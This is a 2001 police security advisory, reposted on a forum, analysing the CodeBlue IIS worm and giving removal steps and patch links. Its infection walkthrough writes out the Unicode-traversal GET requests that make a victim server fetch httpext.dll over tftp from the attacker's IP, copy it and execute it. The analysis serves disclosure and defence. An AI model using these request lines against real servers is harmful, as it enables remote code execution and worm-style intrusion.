发信人: vampiredragon(疯狂追星族)
整理人: starseacn(2001-10-05 09:51:46), 站内信件
|
-----------------------
据公安部检测,近来一种称为“蓝色代码”(Worm.IIS.CodeBlue)的计算
机病毒已经开始在我国部分用户中流行。为了确保我市计算机网络的安全可
靠运行,提高抗攻击能力,特发出此通知。
该病毒采用内存到内存的传播机理,主要感染Windows NT和Windows 2000
系统服务器。由于其攻击微软inetinfo.exeIIS服务程序的漏洞,并植入名为
SvcHost.EXE的黑客程序运行,该蠕虫病毒将在服务器内存中不断地生成新的
线程,最终导致系统运行缓慢,甚至瘫痪;如果操作系统是Windows 2000会将
该系统的IIS Admin服务停止运行,导致无法对外提供Web服务,服务器彻底瘫
痪。
蠕虫运行会生成“C:\d.vbs”脚本程序,该脚本程序运行时将停止所有“
.ida,.idq,.printer”的系统服务;同时尝试下载“httpext.dll”到“C:\”
以及“C:\inetpub\scripts\httpext.dll”。
与“红色代码”相比, 红色代码主要攻击IIS中的索引服务,而“蓝色代码”
针对IIS自身的Unicode漏洞,攻击范围更广,传染性更强,黑客程序运行后将全
面控制被感染的系统,同时修改注册表中有关IIS的设置,并在开机时启动程序SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\的注册表项,添加了自动
运行黑客程序SvcHost.EXE的功能,重新启动时黑客程序将自动运行,因此造成
的破坏性将比红色代码更加可怕。
一、该病毒是基于网络传播的,它不感染文件。该病毒包括三个文件:
svchost.exe,d.vbs,httpext.dll,其中httpext.dll运行时会产生一个
svchost.exe,svchost.exe运行时会产生d.vbs。svchost.exe和httpext.dll
都是用VC编写的,svchost.exe在编译完成后用UPX进行了压缩;httpext.dll
使用了Microsoft的MFC。
该病毒主要主向被感染主机发GET请求,GET请求是WEB服务的基本命令,它
向WEB服务器请求一个页面,WEB服务器可以运行某些程序,来生成这些页面。对
于IIS服务器来说,它一般有一个虚拟根scripts(安装IIS时自动建立的),该
虚拟根下的脚本或程序可以根据用户的请求进行执行,虚拟根对应于磁盘上一个
目录,IIS严重问题在于用户能通过该虚拟根执行它对应目录的上一级目录或
其它目录中的程序,但这需要利用IIS服务的UNICODE漏洞,即将某些字符串在
作为UNICODE转换时错误地转换为“\”,即WINDOWS的路径分隔符,因此使客户
可以执行IIS服务器上的一些文件。
二、该病毒初始传染条件为,httpext.dll在C盘根目录,启动svchost.exe
即可感染,开始感染其它机器者称为本机,被感染对象称为被感染主机,下同。
第一步:本机svchost进程调用_beginthread函数创建一个线程,该线程建立
一个基本于UDP协议的文件传输服务器,即tftp服务器,它的作用就是向请求者
发送文件httpext.dll(将文件C:\httpext.dll读入内存,然后等待用户请求)。
第二步:本机svchost进程注册一个窗口类,类名为worm, 按此类创建一个隐藏
窗口。
第三步:这一步到第六步都是本机svchost进程的窗口函数在处理WM_CRERATE
消息时完成的。首先1、在本机设立一个已感染标识,为一全局的名为CodeBlue
的原子(GlobalAtom);
2、修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\
CURRENTVERSION\RUN中建一项,名为Domain Manager以在每次启动系统时自动
运行svchost.exe;3、将C:\svchost.exe和C:\httpext.dll文件改为系统、
隐藏属性。
第四步:产生文件C:\D.VBS,并启动wscript.exe运行该文件。如果本机的当前
操作系统是WINDOWS 2000的话,查找本机的inetinfo.exe进程,并试图结束该
进程。
第五步:调用_beginthread函数创建100个感染线程。每创建一个感染线程,休眠
137毫秒,再创建下一个感染线程。
第六步:休眼5秒后将本机的C:\D.VBS文件删除。 三、感染线程的工作过程如下:
第一步、调用系统API GetSystemTime取本机系统当前时间(UTC时间),如果小时
数大于10且小于11(不可能满足的条件),攻击211.99.196.135(绿盟英文网站)。
第二步、随机生成一个IP地址,如果得到的IP地址为A类地址,则将IP地址的后
两段变为自己IP地址的后两段,否则,直接用计算出的IP地址,该地址即为被
感染主机的IP地址。连接被感染主机的80端口,如果连接失败,根据IP地址休眠
最多4097毫秒后,重复这一步感染下一个地址;如果成功再向被感染主机发送
请求“HEAD / HTTP/1.0”请求,此请求要求被感染主机回答是否支持HTTP 1.0
且为IIS服务器,如果不是IIS服务器,重复这一步,感染下一个地址,如果是,
继续下一步。
第三步、检测被感染主机的IIS服务器的UNICODE漏洞,这种检测最多重试7次,
如果成功,转下步,否则,转第一步。
第四步、调用_beginthread函数创建一个感染线程,向被感染主机发送请求:“GET /scripts/..XX..XX..XX..XX..XX../winnt/system32/cmd?/
c+tftp+-I+YY+get+httpext.dll”XX为检测到的漏洞串,YY为本机IP地址,它
的作用是启动被感染主机winnt/system32目录的tftp.exe程序,“-i”让该程序
以二进进方式从本机取httpext.dll (本机已在svchost.exe启动时建立了tftp
服务器),httpext.dll被传到被感染主机scripts目录中。
第五步、休眼2秒,向被感染主机发请求:
“GET /scripts/..XX..XX..XX..XX..XX../winnt/system32/cmd?/
c+copy+httpext.dll+c:\”,它的作用是让被感染主机将scripts目录
httpext.dll文件从拷贝到被感染主机的C盘根目录下。
第六步、向被感染主机发请求:“GET /scripts/httpext.dll”。此请求导致
被感染主机的IIS服务器运行scripts目录中的httpext.dll,httpext.dll将检
查被感染主机是否有CodeBlue这个全局原子(GlobalAtom),如果没有,生成
svchost.exe,并运行它。这一步如果失败,将最多重试3次。至此感染过程完成。
四、关于D.VBS
此脚本文件将删除本机IIS服务的三个影射.IDA、.IDQ和.printer。
防范措施
1、先将您的网线断掉;
2、安装防病毒软件并将其升级到最新版本,对您的机器进行单机查杀病毒;
3、参照上面的病毒特征,检查您的机器是否已经被感染,如果是,请立即修复;
在 DOS 环境下,清除C:\svchost.exe和C:\httpext.dll文件(隐藏文件)
ATTRIB C:\svchost.exe -H -A -R 回车键
DEL C:\svchost.exe
ATTRIB C:\httpext.dll -H -A -R 回车键
DEL C:\httpext.dll
4、下载和安装微软公司针对“蓝色代码”的补丁程序
Windows NT 的“蓝色代码”补丁程序(中文版)[要先打NT Pack 5;已经
打了NT Pack 7的服务器不用打该“蓝色代码”补丁]
Windows 2000的“蓝色代码”补丁程序(中文版)[要先打Win2000 Pack 1;
打了Windows 2000 Pack 2的机器不用打该“蓝色代码”补丁]
微软补丁地址:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/
http://www.microsoft.com/windows2000/downloads/critical/q269862/
各联单位要认真作好防范措施,并打上相应补丁,防止病毒的感染,确保我
市计算机网络的安全可靠运行。
汕头市公安局计算机管理监察科
二00一年九月八日
|
|